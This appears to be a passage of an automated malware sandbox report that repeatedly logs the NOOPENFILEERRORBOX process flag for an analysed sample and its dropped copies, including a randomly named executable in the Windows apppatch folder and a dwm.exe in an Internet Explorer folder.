Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
